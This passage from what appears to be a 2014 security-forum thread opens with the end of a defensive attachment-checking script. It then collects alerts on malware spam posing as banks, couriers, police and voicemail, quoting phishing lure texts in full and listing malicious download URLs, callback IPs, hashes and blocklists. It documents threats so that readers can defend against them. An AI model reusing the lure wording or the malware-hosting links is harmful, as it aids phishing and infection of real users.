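    for v in assess_attachment("Invoice_0001_pdf.zip", build_sample_zip()):
        flag = "SUSPICIOUS" if v.suspicious else "ok"
        print(f"{flag:10} {v.name:24} claimed={v.claimed or '-'} actual={v.actual}: {v.reason}")
```

The check deliberately treats any PE image as suspicious whatever its name, since none of the senders in this thread have a legitimate reason to mail an executable; the name heuristics only refine the reason given. A mail gateway would run the same logic on the attachment before it reaches a user who has extensions hidden.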
AplusWebMaster
2014-09-18, 14:35
FYI...
Fake NatWest SPAM - malware attached
- http://blog.dynamoo.com/2014/09/important-new-account-invoice-spam.html
18 Sep 2014 - "This -fake- NatWest invoice (since when did banks send invoices?) leads to a malicious ZIP file.
From: NatWest Invoice [invoice@ natwest .com]
Date: 18 September 2014 11:06
Subject: Important - New account invoice
Your latest NatWest invoice has been uploaded for your review. If you have any questions regarding this invoice, please contact your NatWest service team at the number provided on the invoice for assistance.
To view/download your invoice please click here or follow the link below ...
Thank you for choosing NatWest...
The link in this particular email goes to bnsoutlaws .co.uk/qvgstopmdi/njfeziackv.html which then downloads a ZIP file from bnsoutlaws .co.uk/qvgstopmdi/Account_Document.zip which in turn contains a malicious executable Account_Document.scr which has a VirusTotal detection rate of just 1/53*. The ThreatTrack report [pdf] shows that the malware attempts to call home...
Recommended blocklist:
188.165.204.210
liverpoolfc .bg
bnsoutlaws .co.uk"
* https://www.virustotal.com/en-gb/file/9202af35dbf5620096a42766582f231654c74677ee3dcb70a5af6d178fcc0163/analysis/1411032337/
... Behavioural information
TCP connections
91.215.216.52: https://www.virustotal.com/en-gb/ip-address/91.215.216.52/information/
188.165.204.210: https://www.virustotal.com/en-gb/ip-address/188.165.204.210/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en-gb/ip-address/137.170.185.211/information/
UPDATE: The -same- malware is also being pushed by a fake Lloyds Bank email..
From: Lloyds Commercial Bank [secure@ lloydsbank .com]
Date: 18 September 2014 11:45
Subject: Important - Commercial Documents
Important account documents
Reference: C146
Case number: 68819453
Please review BACs documents.
Click link below, download and open document. (PDF Adobe file) ...
- http://myonlinesecurity.co.uk/nat-west-important-new-account-invoice-fake-pdf-malware/
18 Sep 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/Nat-West-New-account-invoice.png
___
Fake eFax SPAM - PDF malware
- http://myonlinesecurity.co.uk/efax-report-fake-pdf-malware/
18 Sep 2014 - "'eFax Report' pretending to come from eFax Report <noreply@ efax-reports .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
INCOMING FAX REPORT
Date/Time: Thursday, 18.09.2014
Speed: 353bps
Connection time: 08:02
Page: 4
Resolution: Normal
Remote ID: 611-748-177946
Line number: 3
DTMF/DID:
Description: Internal only ...
18 September 2014: fax-id9182719182837529.zip ( 189 kb): Extracts to: fax-id9182719182837529.scr
Current Virus total detections: 1/54* . This eFax Report is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/5a6c3fdd158c157b0c7e4293ad0a56b8ef2b2ececd68b4c075fc4b8cc16f6922/analysis/1411049220/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___
Line Voice Message Spam
- http://threattrack.tumblr.com/post/97827881718/line-voice-message-spam
18 Sep 2014 - "Subjects Seen:
You have a voice message
Typical e-mail details:
LINE Notification
You have a voice message, listen it now.
Time: 21:12:45 14.10.2014, Duration: 45sec
Malicious URLs:
iagentnetwork .com/sql.php?line=gA7EF9bA7ns68jJ0eBi8ww
Malicious File Name and MD5:
LINE_Call_<phone number>.zip (7FC6D33F62942B55AD94F20BDC7A3797)
LINE_Call_<phone number>.exe (C3E0F4356A77D18438A38110F8BD919E)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/ad77337f36ff7e57db548378c0b961b2/tumblr_inline_nc4325Jmds1r6pupn.png
Tagged: Line.me, Kuluoz
147.202.201.24: https://www.virustotal.com/en/ip-address/147.202.201.24/information/
:mad: :fear::fear:
AplusWebMaster
2014-09-19, 15:13
FYI...
Fake 'voice mail' SPAM ...
- http://blog.dynamoo.com/2014/09/this-fake-voice-mail-message-leads-to.html
19 Sep 2014 - "This -fake- voice mail message leads to malware:
From: Microsoft Outlook [no-reply@ victimdomain .com]
Date: 19 September 2014 11:59
Subject: You have received a voice mail
You received a voice mail : VOICE976-588-6749.wav (25 KB)
Caller-Id: 976-588-6749
Message-Id: D566Y5
Email-Id: <REDACTED>
Download and extract to listen the message.
We have uploaded voicemail report on dropbox, please use the following link to download your file...
Sent by Microsoft Exchange Server
The link in the email messages goes to www .prolococapena .com/yckzpntfyl/mahlqhltkh.html first and then downloads a file from www .prolococapena .com/yckzpntfyl/Invoice102740_448129486142_pdf.zip which contains exactly the -same- malicious executable being pushed in this earlier spam run*."
* http://blog.dynamoo.com/2014/09/natwest-statement-spam-yet-again.html
19 Sep 2014 - "... shows network activity to hallerindia .com on 192.185.97.223. I would suggest that this is a good domain to -block- ..."
Screenshot: https://2.bp.blogspot.com/-Oo5Lnrowt70/VBwJo-dVgRI/AAAAAAAAFpY/TzfWXXSEP88/s1600/natwest.png
192.185.97.223: https://www.virustotal.com/en/ip-address/192.185.97.223/information/
- http://myonlinesecurity.co.uk/natwest-statement-fake-pdf-malware/
19 Sep 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/nat-west-statement.png
Current Virus total detections: 1/54*
* https://www.virustotal.com/en/file/a56ef62b4154849c04b28dd78ff2d4d383c98eb7e38785c10e9b58932f3dc0ca/analysis/1411120481/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___
Fake 'Police Suspect' SPAM - PDF malware
- http://myonlinesecurity.co.uk/city-london-police-homicide-suspect-fake-pdf-malware/
19 Sep 2014 - "'City of London Police Homicide Suspect' pretending to come from City of London Police is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Bulletin Headline: HOMICIDE SUSPECT
Sending Agency: London City Police
Sending Location: GB – London – London City Police
Bulletin Case#: 14-62597
Bulletin Author: BARILLAS #1169
Sending User #: 92856
APBnet Version: 684593
The bulletin is a pdf attachment to this email.
The Adobe Reader (from Adobe .com) will display and print the bulletin best.
You can Not reply to the bulletin by clicking on the Reply button in your email software.
Of course it is -fake- and -not- from any Police force or Police service in UK or worldwide.
19 September 2014: Homicide-case#15808_pdf.zip : Extracts to: Homicide-case#15808_pdf.exe
Current Virus total detections: 4/55* . This 'City of London Police Homicide Suspect' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/ae7f419e0093fd2d4892ea6920aaa2c12c95cede9c97cb0a1f096496d4ff93ea/analysis/1411120670/
... Behavioural information
TCP connections
188.165.204.210: https://www.virustotal.com/en/ip-address/188.165.204.210/information/
192.185.97.223: https://www.virustotal.com/en/ip-address/192.185.97.223/information/
___
Fake 'Courier Svc' SPAM - PDF malware
- http://myonlinesecurity.co.uk/tnt-courier-service-tnt-uk-limited-package-tracking-fake-pdf-malware/
19 Sep 2014 - "'TNT UK Limited Package tracking' pretending to come from TNT COURIER SERVICE <tracking@tnt.co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
TNT COURIER SERVICE (TCS)
Customer/Delivery Services Department
Central Pk Est/Mosley Rd, Trafford Park
Manchester, M17 1TT UK.
DETAILS OF PACKAGE
Reg order no: 460911612900
Your package have been picked up and is ready for dispatch.
Connote # : 460911612900
Service Type : Export Non Documents – Intl
Shipped on : 18 Sep 14 12:00
Order No : 4240629
Status : Driver’s Return
Description : Wrong Address
Service Options: You are required to select a service option below.
The options, together with their associated conditions.
Please check attachment to view information about the sender and package.
19 September 2014: Label_GB1909201488725UK_pdf.zip: Extracts to: Label_GB1909201488725UK_pdf.exe
Current Virus total detections: 5/55* . This 'TNT UK Limited Package tracking' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/ae7f419e0093fd2d4892ea6920aaa2c12c95cede9c97cb0a1f096496d4ff93ea/analysis/1411121703/
... Behavioural information
DNS requests
hallerindia .com (192.185.97.223)
TCP connections
188.165.204.210: https://www.virustotal.com/en/ip-address/188.165.204.210/information/
192.185.97.223: https://www.virustotal.com/en/ip-address/192.185.97.223/information/
___
Bitcoin Ponzi scheme ...
- http://www.reuters.com/article/2014/09/19/us-sec-bitcoin-fraud-idUSKBN0HE1Z820140919
Sep 19, 2014 - "A U.S. federal judge in Texas ordered Bitcoin Savings and Trust and its owner to pay a combined $40.7 million after the Securities and Exchange Commission established that the company, which sold investments using the virtual currency, was a Ponzi scheme. In a decision dated Thursday, U.S. Magistrate Judge Amos Mazzant said Trendon Shavers "knowingly and intentionally" operated his company "as a sham and a Ponzi scheme," misleading investors about the use of their bitcoin, how he would generate promised returns and the safety of their investments... The SEC said Shavers used the online moniker "pirateat40" to raise more than 732,000 bitcoin from February 2011 to August 2012, promising investors up to 7 percent in weekly interest to be paid based on his ability to trade the currency. But according to the decision, Shavers used new bitcoin to repay earlier investors, diverted some to personal accounts at the now-bankrupt Mt. Gox exchange and elsewhere, and spent some investor funds on rent, food, shopping and casino visits..."
___
Apple Phish ...
- https://isc.sans.edu/diary.html?storyid=18669
2014-09-18 23:58:53 UTC - "... this in this morning:
Dear Client,
We inform you that your account is about to expire in less 48 hours, it's imperative to update your information with our audit forms, otherwise your session and/or account will be a limited access.
just click the link below and follow the steps our request form
Update now...
This is an automatically generated message. Thank you not to answer. If you need help, please visit the Apple Support.
Apple Client Support.
A variation on the -many- phishing emails we see regularly, just taking advantage of two public events, the celebrity photos and the release of the new phone. Maybe a reminder to staff as well as friends and family to -ignore- emails that say "click here" ..."
___
Hack the ad network like a boss...
- https://www.virusbtn.com/blog/2014/08_15.xml
4 Sep 2014 - "... Exploit kits have been the scourge of the web for many years. Typically starting with a single line of inserted code, they probe for a number of vulnerabilities in the browser or its plug-ins and use this to drop malware onto the victim's machine. Given the high proportion of Internet users that haven't fully patched their systems, it is a successful way to spread malware.
> https://www.virusbtn.com/images/news/general_malicious_ads.png
... in order for exploit kits to do their work, a vulnerable website must first be infected, or the user must be enticed into clicking a malicious link. But by purchasing ad space, and using this to place malicious ads, attackers have discovered a cheap and effective way to get their malicious code to run inside the browser of many users. They can even tailor their advertisements to target specific languages, regions or even website subjects... We learned last month that this is a serious problem - when researchers found that cybercriminals had purchased advertising space on Yahoo in order to serve the 'Cryptowall' ransomware.
> https://www.virusbtn.com/images/news/youtube_malicious_ads.png
Ideally... advertising networks would block malicious ads as they are added to their systems... this is easier said than done: given the size of such networks, it would take a lot of time and resources - plus, technically, it's difficult to block most malicious ads without a certain percentage of false positives..."
:fear::fear: :mad:
AplusWebMaster
2014-09-22, 15:04
FYI...
Fake gov't SPAM
- http://blog.dynamoo.com/2014/09/your-online-gatewaygovuk-submission-spam.html
22 Sep 2014 - "This -fake- spam from the UK Government Gateway leads to malware:
Screenshot: https://4.bp.blogspot.com/-O44byyBpvKE/VCACHn_z67I/AAAAAAAAFro/5VfC-5YRsOw/s1600/gateway.png
The link in the email does -not- go to gateway .gov.uk at all, but in this case the link goes to the following:
http ://maedarchitettura .it/wfntvkppqi/wnazvamlzv.html ->
http ://www .maedarchitettura .it/wfntvkppqi/wnazvamlzv.html ->
http ://maedarchitettura .it/wfntvkppqi/GatewaySubmission.zip
The ZIP file contains a malicious executable GatewaySubmission.exe which has a VirusTotal detection rate of 1/55*. The Anubis report** shows that it attempts to make a connection to ruralcostarica .com which is probably worth blocking."
* https://www.virustotal.com/en-gb/file/146272b3c4119591adb7fd3f032a6f810a4bd8bd62109792eece587a0ac5c41d/analysis/1411383282/
184.168.152.32: https://www.virustotal.com/en-gb/ip-address/184.168.152.32/information/
** https://anubis.iseclab.org/?action=result&task_id=19b13cf14c76380345d98780f5ac50f82&format=html
- http://myonlinesecurity.co.uk/online-gateway-gov-uk-submission-fake-pdf-malware/
22 Sep 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/Your-online-Gateway.gov_.uk-Submission.png
...
> https://www.virustotal.com/en-gb/file/146272b3c4119591adb7fd3f032a6f810a4bd8bd62109792eece587a0ac5c41d/analysis/1411381013/
___
Fake 'LogMeIn' SPAM – malware
- http://myonlinesecurity.co.uk/september-22-2014-logmein-security-update-malware/
22 Sep 2014 - "'September 22, 2014 LogMeIn Security Update' pretending to come from LogMeIn .com <auto-mailer@ logmein .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Dear client,
We are pleased to announce that LogMeIn has released a new security certificate.
It contains new features:
• The certificate will be attached to the computer of the account holder, which will prevent any fraud activity
• Any irregular activity on your account will be detected by our security department
• This SSL security certificate patches the “Heartbleed” bug discovered earlier this year
Download the attached certificate. Update will be automatically installed by double click.
As always, your Logmein Support Team is happy to assist with any questions you may have.
Feel free to contact us ...
22 September 2014: cert_client.zip (66 kb): Extracts to: cert.scr
Current Virus total detections: 2/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a large blue i instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/a3cf855b9bfbb17e4e293c6d28290de4329338a988b5c6a33e35e7bc6f3b0c3b/analysis/1411400614/
... Behavioural information
DNS requests
icanhazip .com (23.253.218.205)
www .download .windowsupdate .com (95.101.0.104): https://www.virustotal.com/en/ip-address/95.101.0.104/information/
t54cjs4qc2r4bn63 .tor2web .org (65.112.221.20): https://www.virustotal.com/en/ip-address/65.112.221.20/information/
TCP connections
23.253.218.205: https://www.virustotal.com/en/ip-address/23.253.218.205/information/
95.101.0.83: https://www.virustotal.com/en/ip-address/95.101.0.83/information/
38.229.70.4: https://www.virustotal.com/en/ip-address/38.229.70.4/information/
- https://isc.sans.edu/diary.html?storyid=18695
2014-09-22
Screenshot: https://isc.sans.edu/diaryimages/images/Screen%20Shot%202014-09-22%20at%2011_34_06%20AM.png
...
> https://www.virustotal.com/en/file/a3cf855b9bfbb17e4e293c6d28290de4329338a988b5c6a33e35e7bc6f3b0c3b/analysis/
File name: cert.scr.exe
Detection ratio: 3/51
... Behavioural information
DNS requests
icanhazip .com (23.253.218.205): https://www.virustotal.com/en/ip-address/23.253.218.205/information/
www .download.windowsupdate .com (95.101.0.104): https://www.virustotal.com/en/ip-address/95.101.0.104/information/
t54cjs4qc2r4bn63 .tor2web .org (65.112.221.20): https://www.virustotal.com/en/ip-address/65.112.221.20/information/
TCP connections
23.253.218.205: https://www.virustotal.com/en/ip-address/23.253.218.205/information/
95.101.0.83: https://www.virustotal.com/en/ip-address/95.101.0.83/information/
38.229.70.4: https://www.virustotal.com/en/ip-address/38.229.70.4/information/
___
Fake USAA SPAM - PDF malware
- http://myonlinesecurity.co.uk/usaa-policy-renewal-please-print-auto-id-cards-pdf-malware/
22 Sep 2014 - "'USAA Policy Renewal – Please Print Auto ID Cards' pretending to come from USAA <USAA.Web.Services@customermail.usaa.com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/USAA-Policy-Renewal-Please-Print-Auto-ID-Cards.png
22 September 2014: id_card.pdf - Current Virus total detections: 11/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/644635d9cebfd696dd0e71eefce400ac744713b846ef3fb2df8268a1b48cd4cc/analysis/1411415107/
- http://threattrack.tumblr.com/post/98225075443/usaa-insurance-card-spam
23 Sep 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/37ba5ffb65ea0fbf4857f1d0fee84e0b/tumblr_inline_nccw5e1ERc1r6pupn.png
Tagged: USAA, CVE-2013-2729, Upatre, PDFExploit
___
Fake 'RBC Invoice' SPAM – PDF malware
- http://myonlinesecurity.co.uk/rbc-invoices-pdf-malware/
22 Sep 2014 - "'RBC Invoices' pretending to come from RBC Express <ISVAdmin@ rbc .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please review the attached invoices and pay them at your earliest convenience. Feel free to contact us if you have any questions.
Thank you.
22 September 2014: invoice058342.pdf. Current Virus total detections: 10/54*. Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/644635d9cebfd696dd0e71eefce400ac744713b846ef3fb2df8268a1b48cd4cc/analysis/1411409482/
___
Fake 'Payment Advice' SPAM – PDF malware
- http://myonlinesecurity.co.uk/hsbc-payment-advice-issued-fake-pdf-malware/
22 Sep 2014 - "'HSBC Payment Advice Issued' pretending to come from HSBC Bank UK <payment.advice@ hsbc .co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment or follow the link in the email... The email looks like:
Your payment advice is issued at the request of our customer. The advice is for your reference only.
Please download your payment advice at ...
Yours faithfully,
Global Payments and Cash Management
This is an auto-generated email, please DO NOT REPLY. Any replies to this email will be disregarded.
... this drops a slightly different malware paymentadvice .exe with current VT detections of 0/53*. This HSBC Payment Advice Issued is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/844c016c9df09432f82f2a353151ca110c2474c7cb5f09c54ebc64952dd1174d/analysis/1411386112/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___
Fake Invoice SPAM
- http://myonlinesecurity.co.uk/peter-hogarth-sons-ltd-invoice-642555-fake-pdf-malware/
22 Sep 2014 - "'PETER HOGARTH & SONS LTD Invoice 642555' pretending to come from john.williamson@ peterhogarth .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please find attached your Invoice(s)/Credit(s)
PETER HOGARTH & SONS LTD
INDUSTRIAL HYGIENE and PROTECTION
Tel: 01472 345726 | Fax: 01472 250272 | Web...
Estate Road No. 5, South Humberside Industrial Estate, Grimsby, North East Lincolnshire, DN31 2UR
Peter Hogarth & Sons Ltd is a company registered in England.
Company Registration Number: 1143352...
22 September 2014: Attachment.zip (230 kb): Extracts to: Invoice 77261990001.PDF.exe
Current Virus total detections: 3/53*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/809f5007e7e771dbb791d08e166770b17c2de15908b300ef1a241ac9f23215d3/analysis/1411380202/
___
European banks / Europol in cybercrime fightback
- http://www.reuters.com/article/2014/09/22/banks-cybersecurity-europe-idUSL6N0RN1WO20140922
Sep 22, 2014 - "Europe's banks have joined forces with Europol's cybercrime unit to try to combat the rising and increasingly sophisticated threat being posed by cyber criminals to financial firms. The European Banking Federation (EBF), which represents about 4,500 banks, and Europol's European Cybercrime Centre - known as EC3 - said on Monday they had signed a memorandum of understanding to intensify cooperation between law enforcement and the financial sector. Banks are facing frequent attacks from sophisticated hackers. Wall Street bank JP Morgan said last month it was working with U.S. law enforcement authorities to investigate a possible cyber attack, and Royal Bank of Scotland and its UK peers have suffered serious attacks by hackers that have disrupted systems... Cybercrime attacks faced by banks include coordinated attempts to disrupt websites, payment card fraud, and attempts to infiltrate systems to steal money. The agreement between the EBF, which is a federation of 32 national banking lobby groups, and EC3, which links cybercrime divisions of police forces in EU countries, will allow them to exchange know-how, statistics and strategic information. Banks are typically working closely with national police forces to fight cybercrime, and the new agreement should widen that across Europe..."
:mad: :fear:
AplusWebMaster
2014-09-23, 13:48
FYI...
Fake 'Voice Mail' SPAM
- http://blog.dynamoo.com/2014/09/according-to-this-spam-you-have-new.html
23 Sep 2014 - "This strangely titled spam leads to malware.
From: Voice Mail
Date: 23 September 2014 10:17
Subject: You have a new voice
You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.
* The reference number for this message is _qvs8213783583_001
The transmission length was 78
Receiving machine ID : R8KU-UY0G3-ONGH
To download and listen your voice mail please follow the link ...
The link to this secure message will expire in 24 hours ...
The link in the email downloads a file from www .ezysoft .in/ocjnvzulsx/VoiceMail.zip which contains a malicious executable VoiceMail.scr which has a VirusTotal detection rate of 2/54*. According to this Anubis report** the malware attempts to phone home to very-english .co.uk which might be worth blocking."
* https://www.virustotal.com/en-gb/file/2008078314022b0bf08cc1e2a23420ec4f7caab95e00e020ecf07b7c01dbfa35/analysis/1411464313/
** http://anubis.iseclab.org/?action=result&task_id=1ac4290d6f92ed1044d41585aeff6b27a&format=html
- http://myonlinesecurity.co.uk/new-voice-fake-pdf-malware/
23 Sep 2014 - "... 23 Sep 2014: VoiceMail.zip (9kb): Extracts to: VoiceMail.scr. Current Virus total detections: 2/54*
* https://www.virustotal.com/en-gb/file/2008078314022b0bf08cc1e2a23420ec4f7caab95e00e020ecf07b7c01dbfa35/analysis/1411464313/
___
jQuery.com compromised to serve malware via drive-by download
- http://www.net-security.org/malware_news.php?id=2869
23.09.2014 - "jQuery.com, the official website of the popular cross-platform JavaScript library of the same name, had been compromised and had been -redirecting- visitors to a website hosting the RIG exploit kit and, ultimately, delivering information-stealing malware. While any website compromise is dangerous for users, this one is particularly disconcerting because of the demographic of its users... The attack was first detected on September 18, and given that the malicious redirector was hosted on a domain that was registered on the same day, it's more than likely that that was the day when the attack actually started. RiskIQ researchers* have immediately notified the jQuery Foundation about the compromise, and the site's administrators have -removed- the malicious script. The bad news is that they still don't know how the compromise happened, so it just might happen again. Users who have visited the site on or around September 18 are advised to check whether they have been compromised by the malware. The researchers recommend immediate re-imaging of the system, resetting passwords for user accounts that have been used on it, and checking whether suspicious activity has originated from it (data exfiltration, etc.). The only good news in all of this is that there is no indication that the jQuery library was affected."
* http://www.riskiq.com/resources/blog/jquerycom-malware-attack-puts-privileged-enterprise-it-accounts-risk
>> https://blog.malwarebytes.org/?s=RIG+exploit+kit
- https://isc.sans.edu/diary.html?storyid=18699
2014-09-23
46.182.31.77: https://www.virustotal.com/en/ip-address/46.182.31.77/information/
___
Nuclear Exploit Kit evolves, includes Silverlight Exploit
- http://blog.trendmicro.com/trendlabs-security-intelligence/nuclear-exploit-kit-evolves-includes-silverlight-exploit/
Sep 23, 2014 - "... We observed that the Nuclear Exploit Kit recently included the Silverlight exploit (CVE-2013-0074*) in its scope. We believe that the attackers behind the Nuclear Exploit Kit included Silverlight in its roster of targeted software for two reasons: to have an expanded attack surface and to avoid detection (as not many security solutions have detections for this particular exploit)... This particular exploit has also been used in other exploit kits, such as the Angler Exploit Kit... Microsoft has released a bulletin (Microsoft Security Bulletin MS13-022) to address the associated vulnerability... The number of exploits used by the kit has -doubled- since the start of 2014...
Timeline of exploits used by the Nuclear Exploit Kit:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/2-Nuclear-Exploit-Kit-Timeline-01.jpg
Vulnerabilities targeted by the current Nuclear Exploit Kit:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/nuclearexploit_fig4.png
... patches have already been released for the vulnerabilities targeted by the Nuclear Exploit Kit..."
* https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0074 - 9.3 (HIGH)
:mad: :fear::fear:
AplusWebMaster
2014-09-24, 13:25
FYI...
Fake BankLine SPAM
- http://blog.dynamoo.com/2014/09/you-have-received-new-secure-message.html
24 Sep 2014 - "This -fake- BankLine email leads to malware that is not currently detected by any anti-virus engine:
From: Bankline [secure.message@ bankline .com]
Date: 24 September 2014 09:59
Subject: You have received a new secure message from BankLine
You have received a secure message.
Read your secure message by following the link bellow ...
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the Bankline Bank Secure Email Help Desk ...
First time users - will need to register after opening the attachment...
The link in the email goes to ismashahalam .net/xyzpayohjx/ngkzoeqjjs.html which downloads an archive file from ismashahalam .net/xyzpayohjx/SecureMessage.zip. This in turn contains a malicious file SecureMessage.scr which has a VirusTotal detection rate of 0/50*. The Anubis report** shows that the malware phones home to very-english .co.uk which is worth blocking or monitoring."
* https://www.virustotal.com/en-gb/file/2ae91a34c322641a86239ab97ba8995e0e188d67ebd5e472825e53d7b53585eb/analysis/1411546325/
** https://anubis.iseclab.org/?action=result&task_id=1d5af02378c37a5b47d2e9524c46863ef&format=html
- http://myonlinesecurity.co.uk/received-new-secure-message-bankline-fake-pdf-malware/
24 Sep 2014 - "... 24 Sep 2014: SecureMessage.zip: Extracts to: SecureMessage.scr
Current Virus total detections: 7/54*..."
* https://www.virustotal.com/en/file/2ae91a34c322641a86239ab97ba8995e0e188d67ebd5e472825e53d7b53585eb/analysis/1411565004/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___
Fake Voice mail SPAM
- http://myonlinesecurity.co.uk/inclarity-net-voice-message-attached-01636605058-name-unavailable-fake-wav-malware/
24 Sep 2014 - "'Voice Message Attached from 01636605058 – name unavailable' pretending to come from voicemail@ inclarity .net is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Time: Sep 23, 2014 10:50:00 AM
Click attachment to listen to Voice Message
24 September 2014: 01636605058_20140919_105000.wav.zip: Extracts to: 01636605058_20140919_105000.wav.exe
Current Virus total detections: 12/53*
This 'Voice Message Attached from 01636605058 – name unavailable' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav (sound) file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/490f83b60921c80a4666ff9b546ce0a233199949d4a00a6035178fa685debbfb/analysis/1411568872/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___
Fake 'overdue invoice' SPAM – malware
- http://myonlinesecurity.co.uk/reminder-overdue-invoice-malware/
24 Sep 2014 - "'Reminder of overdue invoice' pretending to come from a random name at a random company and with a random named attachment is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... different subjects with this one having different numbers including:
Reminder of overdue invoice: 708872110964932
Overdue Payment: 122274492356288
Due Date E-Mail Reminder: 417785972641224
Payment reminder: 461929101577209
Past Due Reminder Letter: 199488661953143
Bills Reminder: 325332051074690
Automatic reminder: 676901889653218
Late payment: 475999033756578
Reminder: 215728756825356
The email looks like:
Hello,
This is Rex from Olympus Industrial. After a review of our records, we have found your account is past due.
Account ID: 5FCDMF9. This notice is a reminder your payment is due.
Regards,
Rex Gloeckler
Olympus Industrial...
24 September 2014: application_708872110964932_5FCDMF9.rar:
Extracts to: application_708872110964932_5FCDMF9.exe
Current Virus total detections: 3/54*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a file with a red £ sign instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/de2012097279e862bde5f4ffc8e649ede75400aa7c2afd6b343998c91657968f/analysis/1411570178/
... Behavioural information
___
Fake AMEX Phish - 'Home Depot Security concern'
- http://myonlinesecurity.co.uk/american-express-security-concern-data-breach-home-depot-phishing/
24 Sep 2014 - "We are seeing quite a few American Express phishing attempts trying to get your American Express details. These are very well crafted and look identical to genuine American Express emails. The senders appear to be from American Express until you look carefully at the email headers. Do -not- click -any- links in these emails... Today’s version is the 'American Express – Security concern on Data breach at Home Depot' which is a change to previous versions to attempt to make it more believable and attractive for you to click the link & give your details. They are using the recent Home Depot hack and consequent fraudulent transactions* that are being taken from many victims' accounts to scare you into ignoring the usual precautions and get you to give them your details:
* http://www.cnbc.com/id/102027452
Email looks like:
[ AMEX logo ]
Dear Customer: We are writing to you because we need to speak with you regarding a security concern on your account. The Home Depot recently reported that there was unauthorized access to payment data systems at its U.S. stores. American Express has put fraud controls in place and we continue to closely monitor the situation. Our records indicate that you recently used your American Express card on September 19, 2014.
We actively monitor accounts for fraud, and if we see unusual activity which may be fraud, our standard practice is to immediately contact our Card Members. There is no need to call us unless you see suspicious activity on your account.
To ensure the safety of your account , please log on to : ...
Regularly monitor your transactions online at americanexpress .com. If you notice fraudulent transactions, visit our online Inquiry and Dispute Center
Enroll in Account Alerts that notify you via email or text messages about potentially fraudulent activities.
Switch to Paperless Statements that are accessible online through your password-protected account.
Your prompt response regarding this matter is appreciated.
Sincerely,
American Express Identity Protection Team ...
